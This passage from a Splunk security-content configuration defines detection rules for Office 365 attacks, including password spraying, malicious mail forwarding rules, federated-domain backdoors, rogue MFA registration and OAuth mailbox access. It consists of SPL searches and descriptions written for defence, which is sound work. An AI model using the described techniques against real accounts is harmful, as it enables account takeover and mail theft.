Workload=AzureActiveDirectory Operation="Add service principal." | bucket span=10m _time | eval len=mvcount('Actor{}.ID') | eval userType = mvindex('Actor{}.ID',len-1) | search userType = "User" | eval displayName = object | stats count earliest(_time) as firstTime latest(_time) as lastTime values(displayName) as displayName dc(displayName) as unique_apps by src_user | where unique_apps > 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_multiple_service_principals_created_by_user_filter` [ESCU - O365 Multiple Users Failing To Authenticate From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where multiple users (more than 10 unique accounts) have failed to authenticate from a single IP address within a short time span (5 minutes). Such a pattern can be indicative of malicious activities, such as brute-force attacks or password spraying attempts. The detection leverages O365 audit logs, specifically focusing on Azure Active Directory login failures (AzureActiveDirectoryStsLogon). By aggregating these failures based on the source IP address and time, the analytic captures patterns where multiple unique user accounts have authentication failures from the same IP within a 5-minute window. Multiple authentication failures from a single IP address targeting various accounts can be a strong indicator of an attacker trying to gain unauthorized access. It could represent a brute-force attack, password spraying, or other malicious login attempts. Identifying and responding to such patterns promptly is crucial to prevent potential account compromises and unauthorized access to organizational resources. If the detection is a true positive, it suggests that an external entity is actively trying to breach the security by targeting multiple user accounts. While the attempts have been unsuccessful (as indicated by the login failures), it's a clear sign of malicious intent. Immediate action is required to block or monitor the suspicious IP, investigate the nature of the attempts, and potentially notify affected users to take precautionary measures like password changes or enabling multi-factor authentication. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies instances where multiple users (more than 10 unique accounts) have failed to authenticate from a single IP address within a short time span (5 minutes). Such a pattern can be indicative of malicious activities, such as brute-force attacks or password spraying attempts. The detection leverages O365 audit logs, specifically focusing on Azure Active Directory login failures (AzureActiveDirectoryStsLogon). By aggregating these failures based on the source IP address and time, the analytic captures patterns where multiple unique user accounts have authentication failures from the same IP within a 5-minute window. Multiple authentication failures from a single IP address targeting various accounts can be a strong indicator of an attacker trying to gain unauthorized access. It could represent a brute-force attack, password spraying, or other malicious login attempts. Identifying and responding to such patterns promptly is crucial to prevent potential account compromises and unauthorized access to organizational resources. If the detection is a true positive, it suggests that an external entity is actively trying to breach the security by targeting multiple user accounts. While the attempts have been unsuccessful (as indicated by the login failures), it's a clear sign of malicious intent. Immediate action is required to block or monitor the suspicious IP, investigate the nature of the attempts, and potentially notify affected users to take precautionary measures like password changes or enabling multi-factor authentication. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = A source Ip failing to authenticate with multiple users in a short period of time is not common legitimate behavior. action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Multiple Users Failing To Authenticate From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Source Ip $src_ip$ failed to authenticate with 20 users within 5 minutes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Multiple Users Failing To Authenticate From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies instances where multiple users (more than 10 unique accounts) have failed to authenticate from a single IP address within a short time span (5 minutes). Such a pattern can be indicative of malicious activities, such as brute-force attacks or password spraying attempts. The detection leverages O365 audit logs, specifically focusing on Azure Active Directory login failures (AzureActiveDirectoryStsLogon). By aggregating these failures based on the source IP address and time, the analytic captures patterns where multiple unique user accounts have authentication failures from the same IP within a 5-minute window. Multiple authentication failures from a single IP address targeting various accounts can be a strong indicator of an attacker trying to gain unauthorized access. It could represent a brute-force attack, password spraying, or other malicious login attempts. Identifying and responding to such patterns promptly is crucial to prevent potential account compromises and unauthorized access to organizational resources. If the detection is a true positive, it suggests that an external entity is actively trying to breach the security by targeting multiple user accounts. While the attempts have been unsuccessful (as indicated by the login failures), it's a clear sign of malicious intent. Immediate action is required to block or monitor the suspicious IP, investigate the nature of the attempts, and potentially notify affected users to take precautionary measures like password changes or enabling multi-factor authentication. action.notable.param.rule_title = O365 Multiple Users Failing To Authenticate From Ip action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation=UserLoginFailed ErrorNumber=50126 | bucket span=5m _time | stats dc(user) as unique_accounts values(user) as user values(LogonError) as LogonError values(signature) as signature values(UserAgent) as UserAgent by _time, src_ip | where unique_accounts > 10 | `o365_multiple_users_failing_to_authenticate_from_ip_filter` [ESCU - O365 New Email Forwarding Rule Created - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection is crafted to monitor and identify the creation of new email forwarding rules in an Office 365 environment. It specifically targets events logged under New-InboxRule and Set-InboxRule operations within o365_management_activity, indicating the establishment or modification of inbox rules that forward emails. The detection checks for the presence of parameters such as ForwardTo, ForwardAsAttachmentTo, and RedirectTo, which are key indicators of email forwarding behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection is crafted to monitor and identify the creation of new email forwarding rules in an Office 365 environment. It specifically targets events logged under New-InboxRule and Set-InboxRule operations within o365_management_activity, indicating the establishment or modification of inbox rules that forward emails. The detection checks for the presence of parameters such as ForwardTo, ForwardAsAttachmentTo, and RedirectTo, which are key indicators of email forwarding behavior. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Users may create email forwarding rules for legitimate purposes. Filter as needed. action.escu.creation_date = 2024-03-27 action.escu.modification_date = 2024-03-27 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 New Email Forwarding Rule Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A forwarding email inbox rule was created for $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 New Email Forwarding Rule Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection is crafted to monitor and identify the creation of new email forwarding rules in an Office 365 environment. It specifically targets events logged under New-InboxRule and Set-InboxRule operations within o365_management_activity, indicating the establishment or modification of inbox rules that forward emails. The detection checks for the presence of parameters such as ForwardTo, ForwardAsAttachmentTo, and RedirectTo, which are key indicators of email forwarding behavior. action.notable.param.rule_title = O365 New Email Forwarding Rule Created action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` (Operation=New-InboxRule OR Operation=set-InboxRule) | eval match1=mvfind('Parameters{}.Name', "ForwardTo") | eval match2=mvfind('Parameters{}.Name', "ForwardAsAttachmentTo") | eval match3=mvfind('Parameters{}.Name', "RedirectTo") | where match1>= 0 OR match2>= 0 OR match3>= 0 | eval ForwardTo=coalesce(ForwardTo, ForwardAsAttachmentTo, RedirectTo) | stats count min(_time) as firstTime max(_time) as lastTime values(Name) as Name by user Operation ForwardTo | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_email_forwarding_rule_created_filter` [ESCU - O365 New Email Forwarding Rule Enabled - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection aims to identify instances where new email forwarding rules are created through the UpdateInboxRules operation within an Office 365 environment. Despite the operation name suggesting an update, this specific scenario involves the addition of new rules that direct emails to external recipients, captured under the ForwardToRecipientsAction. The analytic examines the OperationProperties to extract and validate forwarding addresses, ensuring they adhere to the expected email format. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection aims to identify instances where new email forwarding rules are created through the UpdateInboxRules operation within an Office 365 environment. Despite the operation name suggesting an update, this specific scenario involves the addition of new rules that direct emails to external recipients, captured under the ForwardToRecipientsAction. The analytic examines the OperationProperties to extract and validate forwarding addresses, ensuring they adhere to the expected email format. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Users may create email forwarding rules for legitimate purposes. Filter as needed. action.escu.creation_date = 2024-03-28 action.escu.modification_date = 2024-03-28 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 New Email Forwarding Rule Enabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A forwarding email inbox rule was created for $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 New Email Forwarding Rule Enabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection aims to identify instances where new email forwarding rules are created through the UpdateInboxRules operation within an Office 365 environment. Despite the operation name suggesting an update, this specific scenario involves the addition of new rules that direct emails to external recipients, captured under the ForwardToRecipientsAction. The analytic examines the OperationProperties to extract and validate forwarding addresses, ensuring they adhere to the expected email format. action.notable.param.rule_title = O365 New Email Forwarding Rule Enabled action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange Operation=UpdateInboxRules | eval match1=mvfind('OperationProperties{}.Value', "ForwardToRecipientsAction") | eval match2=mvfind('OperationProperties{}.Value', "ForwardAsAttachmentToRecipientsAction") | eval match3=mvfind('OperationProperties{}.Value', "RedirectToRecipientsAction") | eval index = mvfind('OperationProperties{}.Name', "ServerRule") | where match1>= 0 OR match2>= 0 OR match3>= 0 | eval ServerRule = mvindex('OperationProperties{}.Value', index-1) | spath input=ServerRule path=Actions{}.Recipients{}.Values{}.Value output=valueExtracted | mvexpand valueExtracted | search valueExtracted="*@*.*" | eval ForwardTo=if(match(valueExtracted, "^[^@]+@[^@]+\\.[^@]+$"), valueExtracted, null) | dedup ForwardTo | where isnotnull(ForwardTo) | stats count min(_time) as firstTime max(_time) as lastTime values(Name) as Name by user Operation ForwardTo | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_email_forwarding_rule_enabled_filter` [ESCU - O365 New Federated Domain Added - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of a new federated domain in an organization's Office 365 environment. This behavior is detected by analyzing the Office 365 management activity logs using the Splunk query o365_management_activity, specifically filtering for the Workload=Exchange and Operation="Add-FederatedDomain" parameters. The addition of a new federated domain can be a significant security concern, as it might indicate unauthorized changes or potential compromises within the Office 365 setup. Attackers, upon gaining sufficient privileges, could add a federated domain to establish a backdoor, bypass security measures, or exfiltrate data. Such unauthorized changes can lead to data breaches, unauthorized access to sensitive data, and potential compromise of organizational infrastructure. When this analytic is triggered, immediate steps should include reviewing the details of the added federated domain, such as the organization name, originating server, user ID, and user key. Concurrent processes or other indicators of compromise should also be investigated to pinpoint the source of the potential breach. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of a new federated domain in an organization's Office 365 environment. This behavior is detected by analyzing the Office 365 management activity logs using the Splunk query o365_management_activity, specifically filtering for the Workload=Exchange and Operation="Add-FederatedDomain" parameters. The addition of a new federated domain can be a significant security concern, as it might indicate unauthorized changes or potential compromises within the Office 365 setup. Attackers, upon gaining sufficient privileges, could add a federated domain to establish a backdoor, bypass security measures, or exfiltrate data. Such unauthorized changes can lead to data breaches, unauthorized access to sensitive data, and potential compromise of organizational infrastructure. When this analytic is triggered, immediate steps should include reviewing the details of the added federated domain, such as the organization name, originating server, user ID, and user key. Concurrent processes or other indicators of compromise should also be investigated to pinpoint the source of the potential breach. action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity. action.escu.known_false_positives = The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider. action.escu.creation_date = 2023-08-02 action.escu.modification_date = 2023-08-02 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 New Federated Domain Added - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse"] action.risk = 1 action.risk.param._risk_message = User $user$ has added a new federated domain $new_value$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 New Federated Domain Added - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of a new federated domain in an organization's Office 365 environment. This behavior is detected by analyzing the Office 365 management activity logs using the Splunk query o365_management_activity, specifically filtering for the Workload=Exchange and Operation="Add-FederatedDomain" parameters. The addition of a new federated domain can be a significant security concern, as it might indicate unauthorized changes or potential compromises within the Office 365 setup. Attackers, upon gaining sufficient privileges, could add a federated domain to establish a backdoor, bypass security measures, or exfiltrate data. Such unauthorized changes can lead to data breaches, unauthorized access to sensitive data, and potential compromise of organizational infrastructure. When this analytic is triggered, immediate steps should include reviewing the details of the added federated domain, such as the organization name, originating server, user ID, and user key. Concurrent processes or other indicators of compromise should also be investigated to pinpoint the source of the potential breach. action.notable.param.rule_title = O365 New Federated Domain Added action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation IN ("*add*", "*new*") AND Operation="*domain*" | stats count values(ModifiedProperties{}.NewValue) as new_value by user user_agent authentication_service action Workload Operation | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_federated_domain_added_filter` [ESCU - O365 New Forwarding Mailflow Rule Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic monitors for the creation of new mail flow rules in Office 365 that could potentially redirect or copy emails to unauthorized or external addresses. This analytic works by querying the Office 365 Management Activity logs for any operation tagged as "New-TransportRule". It specifically looks for parameters indicative of mail forwarding actions, such as "BlindCopyTo", "CopyTo", and "RedirectMessageTo". If any of these parameters are present, indicating that a forwarding rule has been set up, the detection then captures the details of this rule, including the user ID responsible for the creation, the name of the rule, the forwarding target, and the timestamps of the rule's creation and last modification. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic monitors for the creation of new mail flow rules in Office 365 that could potentially redirect or copy emails to unauthorized or external addresses. This analytic works by querying the Office 365 Management Activity logs for any operation tagged as "New-TransportRule". It specifically looks for parameters indicative of mail forwarding actions, such as "BlindCopyTo", "CopyTo", and "RedirectMessageTo". If any of these parameters are present, indicating that a forwarding rule has been set up, the detection then captures the details of this rule, including the user ID responsible for the creation, the name of the rule, the forwarding target, and the timestamps of the rule's creation and last modification. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Forwarding mail flow rules may be created for legitimate reasons, filter as needed. action.escu.creation_date = 2024-04-10 action.escu.modification_date = 2024-04-10 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 New Forwarding Mailflow Rule Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A new forwarding mailflow rule was created by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 New Forwarding Mailflow Rule Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic monitors for the creation of new mail flow rules in Office 365 that could potentially redirect or copy emails to unauthorized or external addresses. This analytic works by querying the Office 365 Management Activity logs for any operation tagged as "New-TransportRule". It specifically looks for parameters indicative of mail forwarding actions, such as "BlindCopyTo", "CopyTo", and "RedirectMessageTo". If any of these parameters are present, indicating that a forwarding rule has been set up, the detection then captures the details of this rule, including the user ID responsible for the creation, the name of the rule, the forwarding target, and the timestamps of the rule's creation and last modification. action.notable.param.rule_title = O365 New Forwarding Mailflow Rule Created action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange Operation="New-TransportRule" | eval match1=mvfind('Parameters{}.Name', "BlindCopyTo") | eval match2=mvfind('Parameters{}.Name', "CopyTo") | eval match3=mvfind('Parameters{}.Name', "RedirectMessageTo") | where match1>= 0 OR match2>= 0 OR match3>=0 | eval ForwardTo=coalesce(BlindCopyTo, CopyTo, RedirectMessageTo) | search ForwardTo!="" | rename UserId as user | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, user, Name, ForwardTo | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_forwarding_mailflow_rule_created_filter` [ESCU - O365 New MFA Method Registered - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Office 365 by monitoring O365 audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Office 365 by monitoring O365 audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Users may register MFA methods legitimally, investigate and filter as needed. action.escu.creation_date = 2023-10-20 action.escu.modification_date = 2023-10-20 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 New MFA Method Registered - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms"] action.risk = 1 action.risk.param._risk_message = A new MFA method was added for $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 New MFA Method Registered - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Office 365 by monitoring O365 audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account. action.notable.param.rule_title = O365 New MFA Method Registered action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Update user." | eval propertyName = mvindex('ModifiedProperties{}.Name', 0) | search propertyName = StrongAuthenticationMethod | eval oldvalue = mvindex('ModifiedProperties{}.OldValue',0) | eval newvalue = mvindex('ModifiedProperties{}.NewValue',0) | rex field=newvalue max_match=0 "(?i)(?\"MethodType\")" | rex field=oldvalue max_match=0 "(?i)(?\"MethodType\")" | eval count_new_method_type = coalesce(mvcount(new_method_type), 0) | eval count_old_method_type = coalesce(mvcount(old_method_type), 0) | where count_new_method_type > count_old_method_type | stats earliest(_time) as firstTime latest(_time) as lastTime values(propertyName) by user newvalue oldvalue | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_mfa_method_registered_filter` [ESCU - O365 OAuth App Mailbox Access via EWS - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects when emails are accessed in Office 365 Exchange via Exchange Web Services (EWS), as indicated by the ClientInfoString field starting with "Client=WebServices;ExchangeWebServices". It monitors mailbox activities, focusing on OAuth-authenticated applications that interact with EWS. The query aggregates key metrics such as access counts, timing, and client IP addresses, categorized by user, ClientAppId, OperationCount, and AppId. For defenders, it is critical to keep track of OAuth applications using EWS to access emails, as this information is instrumental in identifying and preventing potential abuse or unauthorized data access. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Web"] action.escu.eli5 = The following analytic detects when emails are accessed in Office 365 Exchange via Exchange Web Services (EWS), as indicated by the ClientInfoString field starting with "Client=WebServices;ExchangeWebServices". It monitors mailbox activities, focusing on OAuth-authenticated applications that interact with EWS. The query aggregates key metrics such as access counts, timing, and client IP addresses, categorized by user, ClientAppId, OperationCount, and AppId. For defenders, it is critical to keep track of OAuth applications using EWS to access emails, as this information is instrumental in identifying and preventing potential abuse or unauthorized data access. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = OAuth applications may access mailboxes for legitimate purposes, you can use the src_ip to add trusted sources to an allow list. action.escu.creation_date = 2024-01-31 action.escu.modification_date = 2024-01-31 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 OAuth App Mailbox Access via EWS - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = An OAuth application identified with id $ClientAppId$ accesed mailboxes through the Graph API. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 OAuth App Mailbox Access via EWS - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects when emails are accessed in Office 365 Exchange via Exchange Web Services (EWS), as indicated by the ClientInfoString field starting with "Client=WebServices;ExchangeWebServices". It monitors mailbox activities, focusing on OAuth-authenticated applications that interact with EWS. The query aggregates key metrics such as access counts, timing, and client IP addresses, categorized by user, ClientAppId, OperationCount, and AppId. For defenders, it is critical to keep track of OAuth applications using EWS to access emails, as this information is instrumental in identifying and preventing potential abuse or unauthorized data access. action.notable.param.rule_title = O365 OAuth App Mailbox Access via EWS action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange Operation=MailItemsAccessed AppId=* ClientAppId=* | regex ClientInfoString="^Client=WebServices;ExchangeWebServices" | stats count earliest(_time) as firstTime latest(_time) as lastTime values(ClientIPAddress) as src_ip by user ClientAppId OperationCount AppId ClientInfoString | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_oauth_app_mailbox_access_via_ews_filter` [ESCU - O365 OAuth App Mailbox Access via Graph API - Rule] action.escu = 0 action.escu.enabled = 1 description = This Splunk analytic detects when emails are accessed in Office 365 Exchange via the Microsoft Graph API, identified by the client ID '00000003-0000-0000-c000-000000000000'. It tracks the 'MailItemsAccessed' operation within the Exchange workload, focusing on OAuth-authenticated applications. The query compiles statistics on access frequency, timing, and client IP addresses, organized by user, client application ID, and AppId. For defenders, it's crucial to maintain an inventory of all OAuth applications that read emails, using this data to scrutinize and identify any potential abusive access patterns. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This Splunk analytic detects when emails are accessed in Office 365 Exchange via the Microsoft Graph API, identified by the client ID '00000003-0000-0000-c000-000000000000'. It tracks the 'MailItemsAccessed' operation within the Exchange workload, focusing on OAuth-authenticated applications. The query 